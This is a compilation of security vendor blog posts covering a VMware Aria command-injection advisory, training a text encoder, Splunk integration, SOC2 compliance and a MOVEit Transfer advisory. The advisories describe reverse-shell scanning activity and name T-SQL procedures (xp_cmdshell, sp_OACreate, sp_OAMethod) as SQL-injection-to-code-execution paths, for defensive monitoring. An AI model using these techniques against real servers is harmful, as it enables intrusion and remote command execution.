Blog
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Observed In The Wild: New Tag For CVE-2023-20887 — VMWare Aria Operations for Networks

On June 7, 2023 VMWare released an advisory for CVE-2023-20887, a command injection vulnerability in VMware Aria Operations for Networks (formerly vRealize Cloud Mangememt) with a critical severity score (CVSS) of 9.8. The proof of concept for this exploit was released June 13th, 2023 by SinSinology. 

Primary takeaway is:

“VMWare Aria Operations Networks is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user.” – SinSinology


This issue can be resolved by updating to the latest version. Further information can be found here: https://www.vmware.com/security/advisories/VMSA-2023-0012.html

At the time of writing we have observed attempted mass-scanning activity utilizing the Proof-Of-Concept code mentioned above in an attempt to launch a reverse shell which connects back to an attacker controlled server in order to receive further commands. Continual monitoring of activity related to this vulnerability can be tracked via the relevant GreyNoise tag below.

Example HTTP POST request containing code to exploit the described vulnerability

Text Embedding for Fun and Profit

Words != Numbers

Computers don’t understand words. They don’t understand verbs, nouns, prepositions, or even adjectives. They kinda understand conjunctions (and/or/not), but not really. Computers understand numbers.

To make computers do things with words, you have to make them numbers. Welcome to the wild world of text embedding!

In this blog I want to teach you about text embedding, why it’s useful, and a couple ways to do it yourself to make your pet project just a little bit better or get a new idea off the ground. I’ll also describe how we’re using it at GreyNoise.

Use Cases

With LLMs in the mix, modern use cases of text embedding are all over the place.

  • Can’t fit all your text into a context window? Try embedding and searching the relevant parts.
  • Working on sentiment analysis? Try to build a classifier on embedded text
  • Looking to find similar texts? Create a search index on embedded values
  • Want to build a recommendation system? Figure out how things are similar without building a classification model

In all of these, we’re encoding a piece of text into a numerical vector in order to do basic machine learning tasks against it, such as nearest neighbors or classification. If you’ve been paying attention in class, this is just feature engineering, but it’s unsupervised and on unstructured data, which has previously been a really hard problem.

How to method 1: Cheat mode

Lots of large models will offer sentence level embedding APIs. One of the most popular ones is OpenAI https://platform.openai.com/docs/guides/embeddings. It doesn’t cost a ton, probably under $100 for most data sets, but you’re dependent on the latency of external API calls and the whims of another company. Plus, since it’s a GPT model it is based on the encoding of the last word in your text (with the cumulative words before it), that doesn’t feel as cohesive as what I’m going to suggest next. (This is foreshadowing a BERT vs GPT discussion)

How to method 2: Build your own

Side quest: GPT vs BERT

GPT stands for Generative Pre-trained Transformer. It is built to predict the next word in a sequence, and then the next word, and then the next word. Alternately, BERT stands for Bidirectional Encoder Representations from Transformers. It is built to predict any word within a set piece of text. 

The little bit of difference between them, because they both use Transformers, is where they mask data while training. During the training process a piece of the text is masked, or obscured, from the model and the model is asked to predict it. When the model gets it right, hooray! When the model gets it wrong, booo! These actions either reinforce or change the weights of the neural network to hopefully better predict in the future. 

GPT models only mask the last word in a sequence. They are trying to learn and predict that word. This makes them generative. If your sequence is “The cat jumped” it might predict “over”. Then your sequence would be “The cat jumped over” and it might predict “the”, then “dog”, etc. 

BERT models mask random words in the sequence, so they are taking the entire sequence and trying to figure out the word based on what came before and after (bidirectional!!!). For this point, I believe they are better for text embedding. Note, the biggest GPT models are orders of magnitude bigger than the biggest BERT models because there is more money in generation than encoding/translation, so it is possible GPT4 does a better job at generic sentence encoding than a home grown BERT, but let's all collectively stick it to the man and build our own, it’s easy.

Figure 1: BERT based masking
Figure 2: GPT based masking

Main quest: Building a text encoder

If your data is perhaps not just basic English text data, building your own encoder and model might be the right decision. For GreyNoise, we have a ton of HTTP payloads that don’t exactly follow typical English language syntax. For this point, we decided to build our own payload model and wanted to share the knowledge.

There are two parts of a LLM. The same parts you’ll see in HuggingFace models (https://huggingface.co/models) and everywhere else. A Tokenizer and a Model. 

Tokenizer

The tokenizer takes your input text and translates it to a base numerical representation. You can train a tokenizer to learn vocabulary directly from your dataset or use the one attached to a pre-trained model. If you are training a model from scratch you might as well train a tokenizer (it takes minutes), but if you are using a pre-trained model you should stick with the one attached. 

Tokens are approximately words, but if a word is over 4-5 characters it might get broken up. “Fire” and “fly” could each be one token, but “firefly” would be broken into 2 tokens. This is why you might often hear that tokens are “about ¾ of a word”, it’s an average of word to token. Once you have a tokenizer it can translate a text into integers representing the index of the tokenizer set.

“The cat jumped over” -> 456, 234, 452, 8003

Later, supposing we have a model, if you have the output 8003, 456, 234, 452 (I reordered on purpose) you could translate that back to “over the cat jumped”

The tokenizer is the translation of a numeric representation to a word (or partial word) representation. 

Model

With a tokenizer, we can pass numerical data to a model and get numerical data out, and then re-encode that to text data.

We could discuss the models, but others have done that before (https://huggingface.co/blog/bert-101) All of these LLM models are beasts. They have basic (kinda) components, but they have a lot of them, which makes for hundreds of millions to billions of parameters. For 98% of people, you want to know what it does, the pitfalls, and how to use it without knowing the inner workings of how transformer layers are connected to embedding, softmax, and other layers. We’re going to leave that to another discussion. We’ll focus on what it takes to train and get a usable output.

The models can be initialized with basic configs and trained with easy prompts. Thanks to the folks at Huggingface (you the real MVP!). For this we are going to use a RoBERTa model (https://huggingface.co/docs/transformers/model_doc/roberta). You could use a pre-trained model and fine-tune it, however, we’re just going to use the config and build the whole model from random/scratch. A very similar workflow is usable if you want to use a pre-trained model and tokenizer though. I promise I won’t judge.

Code

Import or copy the code from model training gist

Create your own list of text you want to train the encoder and model on. It should be at least 100k samples.

If you have created your data set as `str_data` and set a model path as a folder where you want to save the model and tokenizer, you can just do:

tokenizer = create_tokenizer(model_path, str_data[0:50000]) ## you don’t really need more than 50k to train the tokenizer
model = create_model_from_scratch(model_path, tokenizer)

This will create the tokenizer and model. The tokenizer is usable at this state. The model is just random untrained garbage though.

When you’re ready for the first train, get into the habit of loading the tokenizer and model you created and training it, this is what people call “checkpoints”.

tokenizer = RobertaTokenizerFast.from_pretrained(model_path, max_len=512)
model = RobertaForMaskedLM.from_pretrained(model_path)
model = train_model(tokenizer, model, model_path, str_data[0:100000]) ## train on however much you want at a time, there is a whole other discussion about this, but give it at least 100k samples.

When you want to retrain or further train, which at this point is also called fine-tuning, just load it up and go again with new or the same data. Nobody is your boss and nobody really knows what is best right here.

Note: You’re going to want to use GPUs for training. Google Colab and Huggingface Notebooks have some free options. All in, this particular model will require 9-10GB of GPU memory, easily attainable by commodity hardware.

Evaluating

Large Language Models do not have a great list of sanity checks. Ironically most benchmarks are against other LLMs. For embeddings we can do a little better to work toward your personal model. When you take two samples that you think are similar and run them through the model to get the embeddings, you can calculate how far they are apart with either cosine or Euclidean distance. This gives you a sanity check of if your model is performing as expected or just off the rails.

For Euclidean distance use:

import numpy as np

euclidean_dist = np.linalg.norm(embedding1 - embedding2)

For cosine distance use:

from sklearn.metrics.pairwise import cosine_similarity

cos_sim = cosine_similarity(embedding1.reshape(1, -1), embedding2.reshape(1, -1))

How We’re Using it at GreyNoise

We’re early adopters of LLM tech at GreyNoise, but it is hard to put it in the hands of users responsibly. We basically don’t want to F up. We have an upcoming feature called NoiseGPT that takes natural language text and turns it into GNQL queries. Begone the days of learning a new syntax for just figuring out what the hell is going on. 

We also have an in-development feature called Sift, a way to tease out the new traffic on the internet and describe it for users. This would take the hundreds of thousands of http payloads we see every day and reduce it to the ~15 new and relevant ones and also describe what they are doing. EAP coming on that soon. 

Plus, if you think of any great ideas we should be doing, please hit us up. We have a community slack and my email is below. We want to hear from you. 

Fin

With these tips I hope you’re able to create your own LLM for your projects or at least appreciate those that do. If you have any questions please feel free to reach out to daniel@greynoise.io, give GreyNoise a try (https://viz.greynoise.io/), and look out for features using these techniques in the very near future.

Splunk and GreyNoise Integration: Discovering Hidden Insights through Feeds and Dashboards

If you’ve ever seen a GreyNoise presentation by me, it’s more than likely at some point I will pull up my Splunk instance to show what I would consider to be a few clever dashboards and searches. Apart from the impromptu searches that I may write (which may not be great), there’s some powerful and practical ways you can leverage GreyNoise data inside your Splunk environment right now.

Feeds

With the latest version of the GreyNoise app for Splunk (v.2.2.0), you can now keep the last 24 hours of data local to your Splunk instance with feeds. Plus, it’s easier than ever to filter out noise from large datasets. Instead of relying on API lookups, the data can be referenced locally first to remove opportunistic and benign IP’s quickly when hunting through your data.

Filtering web logs by IP’s not observed by GreyNoise: index=main sourcetype=access_combined | lookup greynoise_indicators.csv ip as clientip| search NOT classification=benign

Dashboards

A good dashboard can turn a bad day into a great one.

I always joke that data isn’t real until it’s displayed on a map, but there's some truth to it! Having a quick overview of your data visually makes it easier to piece together an understanding of the scan activity landscape.

Using custom commands you can pull out information on internet traffic to safely and confidently ignore (things we classify as ‘benign’ or IP’s from the RIOT dataset) and particular pieces of information you may want to investigate further. Everything left over will include the IP’s that are not in GreyNoise, which could indicate more targeted attacks, and IP’s we classify as ‘unknown’.

You can find more information about our classifications and how to apply GreyNoise data to your analysis in our documentation: https://docs.greynoise.io/docs/applying-greynoise-data-to-your-analysis

Paired with information from your firewall imported into Splunk, GreyNoise data leveraged in a dashboard can show vulnerabilities that ‘unknown’ IP’s are specifically looking for. Combining this knowledge with your current vulnerability scans can help you quickly identify if someone is interested in vulnerabilities specific to your attack surface.

Using GreyNoise with firewall data to build a dashboard to find potentially targeted activity as well as provide details for how IP addresses are operating.

Known Good

We talk a lot about filtering out opportunistic traffic, and enriching data based on GreyNoise but let’s not sleep on the RIOT dataset. If you’re not familiar with RIOT it’s a collection of ~50 million IP addresses that are associated with common business services.

What does this let you do with your data in Splunk? There’s a lot of ways that people are applying this dataset in their searches and hunting. Ryan Kovar wrote a great blog post about using wiredata with Splunk (https://www.splunk.com/en_us/blog/security/wire-data-huh-what-is-it-good-for-absolutely-everything-say-it-again-now.html) and while legitimate services can be abused (Hello T1567!) they can also make up a significant portion of the traffic being searched. RIOT makes it easy to do a first pass and remove any outbound traffic to those services and makes it easier to find potentially interesting traffic.

Using RIOT to summarize outbound network activity using Squid proxy data: index=main source=squid:access | gnriot ip_field=src | rename greynoise_name as organization | stats count by organization

More on our RIOT dataset here: https://docs.greynoise.io/docs/riot-data

Learn More About GreyNoise + Splunk

If you find this information useful then join me on June 15th for a live webinar where I’ll cover the Splunk integration in detail. Also, if you are going to .conf 23 we will be there as well! Swing by booth 103 or set up a meeting with us here.  

SOC2 For Startups

GreyNoise today announced that it achieved SOC 2 Type 2 compliance in accordance with American Institute of Certified Public Accountants (AICPA) standards for Systems and Organizational Controls (SOC). Achieving SOC 2 compliance with unqualified opinion serves as third-party industry validation that companies provide best-in-class enterprise-level security for their customers’ data. 

SOC2 is a difficult undertaking, especially if you do not have dedicated compliance or security resources who will contribute to creating the policies and implementing the changes. If you take one thing away from this post, let it be this: hire for Systems Administrator and IT operations roles before you think you need them because it will be too late by the time you do need them. Systems Administration tech debt and work is an exponential curve; the longer you go without them, the harder it becomes to fix. Aside from the struggle of collecting evidence through screenshots and questionnaires, both systems administration and engineering cycles will be required to meet the framework standards and controls. 

Foundation

SOC2 is broken out into five pillars: 

  1. Security of a service organization's system.
  2. Availability of a service organization's system.
  3. Confidentiality of customer information.
  4. Processing integrity of a service organization's system.
  5. Privacy of customer personal information.

Approaching the controls one-by-one can be a daunting task. We found it was more manageable to divide the process into general phases, the last of which is the audit itself.

Phase 1 - Pick the platforms

Our advice here is to not go it alone. From evidence collection and auditor documentation delivery to infrastructure and compliance control scanning, there are myriad different vendors which make every step of the process easier. Take time choosing the auditor that is right for you. Some are very “by the book” and others will be more lenient on “acceptable risk” controls. 

You will need platforms for a lot of controls - including SAST, vulnerability scanning, asset tracking/management, version control, and more. For the most part, free open-source software exists for each step along the way. We found it best to mix and match, opting for paid platforms where open-source implementation was going to take too much engineering time value away from other ongoing projects. For example, gosec and tfsec for some language-specific SAST scanning, CloudFlare’s Flan for internal vulnerability scanning, and Grokability Snipe-IT for asset management versus GitHub Advanced Security licenses, Tenable Nessus, ServiceNow ServiceDesk, or Oomnitza. These latter are perfectly useful products, but it’s important to decide what you want to pay for versus what you can run yourself for free. The value any company puts on each function or service the platform provides compared to the cost or time value of money will be different. 

The two direct SOC2-specific platform choices are the auditor and the compliance automation platform. SOC2 is significantly more difficult without a compliance automation platform - we estimate using such a platform saves over a hundred hours of work.

Auditors: Check which audit firm was used when you collect your SOC2 and SOC3 reports from your vendors. Turn that list into your potential auditor review list, and make a decision for an audit firm based on your meetings and due diligence with those firms. GreyNoise went with Prescient Assurance. They have a security arm that can provide your third-party penetration test, which is optional for SOC2, for a bundle discount.

Compliance Automation: Auditors will need access to a mountain of evidence in the form of read-only access to your environment, screenshots, and questionnaire answers. This is made easier with a compliance automation platform. Whereas an audit firm may not have a process in place for provisioning roles for their access, compliance platforms do, and they make it easy to both roll out and roll back. GreyNoise decided to use SecureFrame as their pricing, offering, and overall functionality/featuring was more directly suited to our needs. Some other popular options include Drata, Vanta, HyperProof, Anecdotes, and Tugboat Logic. 

Phase 2 - Knock out the big stuff

Implement, document, and be able to explain the following eight “heavy-hitters”.

  1. SSO and IAM
  2. PRs, CI/CD, and Version Control
  3. SIEM or Centralized Logging
  4. Infrastructure and Provisioning
  5. MDM
  6. Vendor Management
  7. Scanning
  8. CorpSec

SSO and IAM

Set up Okta, Google Cloud Identity, OneLogin, Azure Active Directory, or Auth0. The choice here depends on what technology you are already using for business productivity. If you are already using Office 365, then Azure Active Directory is the easy choice. If you are already using Google Workspace, then Google Cloud Identity may be the best option. When an employee logs into anything, they would ideally use their work credentials as much as possible. Enforce multi-factor authentication everywhere. Ditch single-user access and access keys and switch to “AssumeRole” if you are leveraging AWS, GCP, or Azure. In our environment, we added SAML tokens to each user in Google Workspace allowing them to assume a role (Read Only, Billing, Administrator, etc.) in the corresponding AWS accounts.

Set a secure password preference order:

  1. Require login via SSO (Okta / Google Cloud Identity)
  2. Require sign in with Google Workspace or Office 365
  3. Require 2FA with standard login OR “magic” link
  4. Standard login

Leverage an organization-wide password manager like 1Password or Bitwarden, with separate “vaults” for departments and roles. Use something with automatic detection of weak or reused passwords, and enforcement of strong password policies.

PRs, CI/CD, and Version Control

Implement some approval processes for your pull requests. Don’t limit it to just a manual review by engineering management or leadership. Include automated testing and the scanning of code for unit, integration, and end-to-end tests to ensure builds are passing and security policies/controls are green. Diagram out the overall process, like this: 

You will need different environments - such as development, staging, and production. Deployments move across each, and are tested in each before actual implementation in the production environment. Ideally, changes to these environments would be tracked and dictated by GitHub, GitLab, BitBucket, or some other code version control platform.

SIEM or Centralized Logging

A SIEM is not a requirement for SOC2, but extensive logging capabilities with alerting are. If there is a resource or storage essential to the operation of your product or business, access and audit logs for the resource should be easily retrieved and reviewed. 

If an employee logs in to a resource from Washington, DC and then logs in from Seattle, WA, a few moments later from a different device, you need to know about it immediately through logging or block that second login altogether. If 100GB of data is downloaded from an S3 bucket when the daily average is 10GB, alarm bells should go off. Establish what “normal” is, and have a process in place to regularly review anomalous activity or anything outside of that normal bound. 

Collecting logs will help you in post-incident response situations. Regularly reviewing and alerting on those logs will help you to avoid post-incident response situations.

Infrastructure and Provisioning

Have a reproducible process in place for spinning up infrastructure resources. This can be implemented with Infrastructure as Code and configuration management tools like Salt, Ansible, Terraform, Chef, Puppet, or CloudFormation. 

SOC2 will be significantly more painful if infrastructure in your environment is created manually by the engineering or IT team without an approval process or automation. GreyNoise infrastructure is entirely in Terraform and Salt. This way, approval and automation are shared with the CI/CD and pull request pipeline. If a process already exists that can be leveraged, it will save time. 

The general idea here is that you should do as much as possible NOT in the web console for something like AWS, Azure, or vCenter. Take note of any actions you perform in the web console - this is your automation list.

Mobile Device Management (MDM)

Install an MDM platform on all company-owned desktops, laptops, and phones. Any device which will access the internal systems of your product or customer data. Roll out the “compliance” packs for SOC2 to enforce things like password complexity, disk encryption, and software update cadence. 

This is a crowded space, often undergoing expansion and consolidation. Fleetsmith was a great Mac OS and iOS MDM tool. Apple acquired the company and quickly removed all capability to install third-party (non-Apple and non-App Store) apps. Apple killed the product two years after the acquisition. The gold-standard for Mac OS and iOS seems to be JAMF/JAMF Pro. 

GreyNoise ended up splitting MDM platforms - one for Mac and one for Windows/Linux. It is a difficult choice to make between a broader platform that covers three Linux distributions, Windows, and Mac OS at a percentage of what you need and two or three platforms that cover almost all of what you need for each.

Vendor Management

A lot of time will be spent on scoring vendor risk based on their operational reliance and the data they access or contain. Part of SOC2 requires collecting compliance reports from these vendors (SOC2, SOC3, ISO 270001, etc.) and reviewing them annually. A comprehensive list of vendors is an important one to keep up to date for both compliance and cost control reasons. 

In developing this list, GreyNoise found a handful of vendors we were still paying but either not using or the service/functionality they provided was duplicated by another platform. Ultimately, SOC2 required us to enumerate our vendors, generate a Software Bill of Materials (SBOM), and led to cost savings by eliminating or consolidating redundant platforms.  

Scanning

An understandably broad topic, but for SOC2 specifically you should be scanning for:

  • Vulnerabilities in dependencies/packages
  • Vulnerabilities in infrastructure in general - both internal and external
  • SOC2 compliance controls 

Each finding should have a rating from informational to critical, and each rating should have a time-to-resolution SLA which dictates how quickly or how much time it takes you to respond to and remediate. There are some free solutions which offer compliance control monitoring, such as SteamPipe compliance packs for AWS. GreyNoise decided to partner with SecureFrame to streamline the monitoring of these controls and to provide auditors with access to our provided documentation and evidence quickly and securely. A compliance automation vendor is strongly recommended for time and sanity's sake. 

CorpSec

SOC2 includes some business operational aspects which will encompass a few different departments or teams in your organization. The following are some examples required for SOC2:

  • Background checks for employees. 
  • Annual security and privacy training for employees. 
  • Documented processes for onboarding, offboarding, encryption, data retention, etc.
  • Regular board meetings, with meeting minutes and bylaws.
  • Quarterly access security reviews.
  • Job descriptions for all roles.

Many compliance automation platforms include auto-generated policies which require slight tweaking and adjustments to pass the “policy” controls. Invest time in either writing your own or significantly building on the automated policy output from your compliance platform. There are plenty of great security companies who publicly publish their policies (https://tailscale.com/security-policies/) which you can build on and adapt to your needs. GreyNoise will also publish our policies in the near future.

Phase 3 - Red to Green

Failing controls and tests will pop up after rolling out the compliance automation platform. The time to resolve these controls varies significantly, so consider this phase will take the longest time. In our experience, the longest controls to flip from red to green were all data encrypted in transit and all data encrypted at rest. 

You will want to resolve these tests until at least 90% are green before kicking off the audit itself. Work with your team to bucket the failing controls, and turn them into issues or projects to be assigned. You can even provide screenshot evidence of these projects and issues as proof of your organization’s incident tracking from discovery to resolution for the SOC2 audit.

This is the phase which will likely take the most time, money, and effort from your team. Unless you “shifted left” right out of the gate and began developing on day one with a security mindset baked in, plan to dedicate a few weeks or a couple of months to remediating failing controls.

Part of the phase also includes screenshot and evidence gathering. SecureFrame helped GreyNoise to easily organize this evidence and gave us an easy way for auditors to access it. This may take several days or weeks to complete and you will wind up with hundreds of screenshots, documents, templates, and examples. 

Phase 4 - Audit

One thing to note is that you will never see a failed SOC2 report or audit. You either get a report or not. If you fail to get a report, you can always try again when you are better positioned. Failure means you get to try again until you succeed. Success means you still need to do it again next year.

Timeline

From project kickoff to completion, SOC2 took GreyNoise about 18 months for the first time. Recertification, which needs to be completed annually, will take us about four months moving forward. 

The time to complete SOC2 accreditation can be greatly reduced by the more dedicated resources you have to the implementation and maintenance of compliance. The shortest amount of time we imagine possible for first-time SOC2 accreditation is six months. 

Keep in mind that you will be reperforming the audit exactly one year after you receive the accreditation. You may decide to add some other compliance certifications, such as ISO 270001. As time goes on and your company grows, compliance becomes harder and will require a dedicated team. 

Two Audits

The audit process is broken down into two phases, Type 1 and Type 2. Type 1 is a short audit period, usually a couple of days, and Type 2 is longer, usually between 60 and 90 days. 

Type 1 means you meet the audit criteria at a single point in time; Type 2 means you maintain compliance with those same criteria over a period of several months. In other words, Type 1 is meeting the compliance standard, and Type 2 is maintaining that compliance standard with any changes over time.

Conclusion

Here are some of our opinions, takeaways, and advice:

  • SOC2 will take you longer than you think
  • Hire System Administrators and IT operations early, as part of the first 20 employees
  • Use a compliance automation platform to save time and effort
  • Break out compliance with the framework into phases, with the audit happening last
  • Plan to build a compliance team to manage the process in the future
  • Treat documentation as a first-class citizen as early as possible
  • Use SOC2 to change process for the better, not just as a compliance checkbox

The way your organization approaches SOC2 compliance can be the easy way or the hard way. Attitude could be easy, to treat compliance like a checkbox and do the minimum to pass the audit. Or it could be hard - to take the input and output from the framework and make significant changes to processes to bake in security as a priority early on for everyone. For those serious about security, the hard choice is easy to make. 

GreyNoise Round Up: Product Updates - May 2023

May brought more product enhancements to user workflows, data coverage… and of course, more interesting tags! Twenty four to be exact, as we continue to improve our product to help our customers monitor emerging threats and identify benign actors. We improved our sensor coverage to include coverage in the country of Ghana, plus we made some helpful improvements to our bulk analysis, RIOT dataset, and APIs.  

Improvement to Bulk Analysis: Export Unknown IPs

The Bulk Analysis function in the GreyNoise Visualizer has been improved so that users can now export unidentified IPs via CSV and JSON.  

This improvement helps analysts more easily identify the ‘interesting’ IPs in a bulk dataset that they are analyzing (IPs identified by GreyNoise are identified to be known common scanners or common business services; IPs that are UNKNOWN in GreyNoise could represent a targeted threat or something that requires additional investigation). 

To access this feature, go to the GreyNoise Analysis page and analyze a file or dataset containing IP addresses.

Improvements to Destination Metadata: Sensor Hits

Two fields have been added to the metadata returned via Bulk Data, IP Context API, and GNQL API that will help users determine baselines or rates of activity:

  • metadata.sensor_hits is the amount of unique data the sensor has recorded from the queried IP.
  • metadata.sensor_count is the number of our sensors from which the IP address or behavior has been observed.

RIOT: Qualys Scanner IPs added

We are now tracking Qualys scanner IP addresses in our RIOT database of common business services, so that customers can whitelist this activity (should they wish to) or contextualize this activity when seen in their security logs.

RIOT identifies IPs from known benign services and organizations that commonly cause false positives in network security and threat intelligence products. The collection of IPs in RIOT is continually curated and verified to provide accurate results.

New and Updated Integrations

Splunk Improvements: High Volume Enrichment, IP Similarity and IP Timeline Support

The GreyNoise App for Splunk has been updated to include a new Feed component, which allows users to ingest the GreyNoise indicator feed into Splunk to be used for high-volume log enrichment. Additionally, new dashboard and commands have been added to support the IP Similarity and IP Timeline tools.  Learn More

ThreatQ Improvements: New Actions for ThreatQ Orchestrator

ThreatQ has released new GreyNoise Actions for the Orchestrator platform which allow for IP Similarity, RIOT and Quick lookups against the GreyNoise API. These updates can be downloaded from the ThreatQ Marketplace.  Learn More

Tags Coverage Enhancements

In May, GreyNoise added 24 new tags:

20 malicious activity tags

3 benign actor tags

1 unknown tag

All GreyNoise users can monitor scanning activity we’ve seen for a tag by creating an alert informing them of any new IPs scanning for tags they are interested in.

Notable Security Research and Detection Engineering Blogs:

KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389

On Monday, May 1, 2023, CISA added CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389 to the Known Exploited Vulnerabilities (KEV) list.  For all three CVEs, GreyNoise users had visibility into which IPs were attempting mass exploitation prior to their addition to the KEV list. GreyNoise tags allow organizations to monitor and prioritize the handling of alerts regarding benign and, in this case, malicious IPs.

Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens

At GreyNoise we recognize the value of partnership and intelligence sharing when it comes to protecting internet citizens. Today the GreyNoise Labs team wants to give a shoutout to Trinity Cyber.

Progress’ MOVEit Transfer Critical Vulnerability: CVE-2023-34362

On May 31st, 2023 Progress issued a security notice to users of MOVEit Transfer regarding a vulnerability that allows for escalated privileges and potential unauthorized access to the environment. CVE-2023-34362 was assigned to this vulnerability on June 2, 2023.

Sensor Coverage Enhancements: Ghana

We’ve added additional sensor coverage for the following countries:

You can view which IPs are seen scanning sensors in certain countries from our IP details page, or use `destination_country:”<country_name>”` in GNQL to find IPs that have hit those regions.  Destination country search is available in all commercial plans for GreyNoise and to our community VIP users.

Start for Free

Progress’ MOVEit Transfer Critical Vulnerability: CVE-2023-34362

GreyNoise recommends reviewing systems for any indicators of unauthorized access that may have occurred within the past 90 days.

On May 31st, 2023 Progress issued a security notice to users of MOVEit Transfer regarding a vulnerability that allows for escalated privileges and potential unauthorized access to the environment. CVE-2023-34362 was assigned to this vulnerability on June 2, 2023. MOVEIT transfer tag can be viewed here.


Progress’ security notice is advising users to review their system for unauthorized access for “at least the past 30 days”, however, GreyNoise has observed scanning activity for the login page of MOVEit Transfer located at /human.aspx as early as March 3rd, 2023. While we have not observed activity directly related to exploitation, all of the 5 IPs we have observed attempting to discover the location of MOVEit installations were marked as “Malicious” by GreyNoise for prior activities.

Based on the scanning activity we have observed, it is our recommendation that users of MOVEit Transfer should extend the time window for their review of potentially malicious activity to at least 90 days.

The primary artifact, observed through publicly available information, is the presence of a webshell named human2.aspx. This is a post-exploitation file artifact that is written to the filesystem by a malicious actor allowing them to execute arbitrary commands.

GreyNoise is observing scanning activity looking to identify the presence of the human2.aspx webshell dropped as part of the post-exploitation activity.

While the specific details of the initial exploitation vector are largely unknown at this time, we would like to provide the following items and details to our customers and community:

  • Several cybersecurity vendors are covering the subject including Rapid7 and TrustedSec
  • Rapid7 is indicating the initial vector may be a SQL injection vulnerability leading to remote code execution (SQLi-to-RCE)
  • Progress MOVEit Transfer is deployed with a Microsoft SQL (MSSQL) or My SQL (MYSQL) backing database
  • The login page of Progress MOVEit Transfer is located at /human.aspx
  • Common paths to achieve remote code execution through SQL injection include the usage of the following T-SQL commands:
  • xp_cmdshell
  • sp_OACreate
  • sp_OAMethod

Last but not least, a big thank you to the GreyNoise community for alerting us to this activity early on.

Enhancing Threat Detection and Response

The Situation

Threat hunters spend a significant portion of their time searching through security logs looking for specific Indicators of Compromise (IoCs) or patterns of activity/behavior that indicate compromise. This work comes with some specific challenges: 

  • Too Many Tools, Too Much (Nonsense) Data: Oftentimes, threat hunters end up with log files or results pages showing long lists of suspicious events (including related IP addresses), and it can take many hours to work through this information to filter and identify malicious activity. 
  • Time Spent Clustering: Identifying infrastructure used by adversaries is a time consuming process.
  • Building Early (but reliable) Detections: Detections developed to identify malicious activity can generate false positives or get outdated quickly if they are based on non-current data.

Techniques to Improve the situation

To further enhance threat hunting and address some of these pain points, organizations can use tools like GreyNoise in conjunction with a SIEM or SOAR platform to quickly identify potential threats and investigate them further and get more out of their existing tools and filter through data sources faster. By understanding how infrastructure is being used, vulnerabilities being leveraged, and patterns of scans, threat hunters can gain valuable context on how adversaries operate and improve their response to threats.

Recently, we held a webinar on this topic, where we discussed how organizations are using specific techniques in their day-to-day operations. To gain perspective on how you can streamline your threat hunting process, sign up for the webinar and download it today to learn: 

  • How to use GreyNoise features and SOAR playbooks to hunt, detect, and defend.
  • The ins and outs of analyzing logs to identify potential DDoS attacks and how to respond to them effectively.
  • Tips and tricks for incorporating vulnerability intelligence into your threat intel reports, which can help you stay ahead of emerging threats.
threat-hunting-webinar-cta

Announcing the GreyNoise Ambassador Program: Empowering Community Members to Make a Difference

GreyNoise is built on a strong foundation of mutual respect from our community. While we love doing swag drops on Twitter (or maybe Bluesky - anyone have an invite?), we wanted to recognize community members that go above and beyond. 

Enter the GreyNoise Ambassador Program! We couldn’t think of a better way to celebrate our users' constant support, spirit of collaboration, and mentorship within our community. I’m here to answer all your burning questions about the program and how you can apply!

Who Is the Ideal Ambassador?

Ambassadors are pillars of the GreyNoise Community. This program celebrates their efforts to support community growth and accessibility, focusing on three key elements:

  • Collaboration: This is not only sharing information, detection, or memes with the team at GreyNoise but with each other! We all win when we share.
  • Mentorship: People who are helpful and educate their peers.
  • Transparency: This is a core GreyNoise belief that you can and should be honest whenever possible.

Ambassadors are folks who have dedicated time and resources to bettering GreyNoise, whether through continuous feedback, bug reports, integrations, conference talks, or they’re just deeply dedicated to reducing Internet Noise. 

Why Join the Ambassador Program?

If you are on the fence about being an ambassador, let us tell you about the perks you get: 

  • Premium swag (see below) 
  • 5 VIP passes to give out to your friends, in line with our VIP guidelines 
  • Early access testing for any new GreyNoise features and products (including the forthcoming GreyNoise honeypot) 
Swag sneak peek!

What Is Expected of Me As An Ambassador?

In exchange for being our Ambassador, we ask that you will do 1 or more of the following:

  • Lead a “How I Use GreyNoise” session (these can be pre-recorded or live & public)
  • Participate in a product feedback session
  • Write a guest blog
  • Speak at a GreyNoise event (In person or virtual!) 
  • Continue to spread the word about GreyNoise :) 

Your term as an Ambassador will last a year, and when Spring 2024 rolls around, you will be asked to reapply.

How Do I Apply?

If this all sounds good to you, we ask that you fill out this application. We will evaluate applications until the end of May and send notice to our Ambassadors in early June!

If you have any questions, don’t hesitate to reach out to the Community team.

via Twitter

Internet Noise Search School with the GreyNoise Product Team - Searching for Words

As a Product Manager at GreyNoise, I’m constantly learning about how our users think about internet noise and accordingly search our data with the GreyNoise Query Language (GNQL). It might surprise you (or not) that we see some pretty random searches.

As evidenced by our 2000s style word cloud, users have been searching anything from “log4shell” to “lockbit” to “mcdonalds.” While GreyNoise search is not a threat actor Google, we do have a lot of data on interesting threats. Let me clear up our search bar for those of us who want to improve our ninja search skills.

What can you search for in GreyNoise?

The answer is anything, which is why you should use GNQL searches!

When you throw a word into the GreyNoise Viz search bar, we treat it like a free text search, where we search all of our data for that term - so this means if you search “banana,” we will return the IP addresses that have scanned for the “/banana/” directory. But we might also return IPs with “banana” in their user agent.

The GNQL way of guaranteeing you only get IPs with “banana” in the HTTP web paths is to utilize the raw_data.web.paths field selector. The search for our banana path would look like raw_data.web.paths:"/banana/"

(15 results!)

More fun with field selectors in GNQL is in our Cheat Sheet.

If you’re looking for an exceptional user agent or organization, we also have field selectors: raw_data.web.useragents and metadata.organization respectively.

For the searches that are word-based but land outside web paths, user agents, and organizations, we have a few other categories they might fall into - Actors, Tools, Botnets, and Techniques. For these, I recommend searching our tags. This is as easy as going to the tags page and utilizing the tag search bar, where we can return all our tags containing your search term.

As for threat groups - at this time, GreyNoise does not dabble in attribution to threat groups. If you’re looking for a particular group, we recommend identifying IoCs that the groups may use if you’re trying to track them down. We have found initial reconnaissance IPs in reports from other research groups lurking in our data and have those web paths that may indicate compromise by C2/botnet activity.

I hope these tips helped level up your GreyNoise search skills to help you find what you’re looking for even faster. Create deep dives into something haunting you using our Cheat Sheet, and stay tuned for more internet noise search tips soon!

Get Started With GreyNoise for Free

Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens

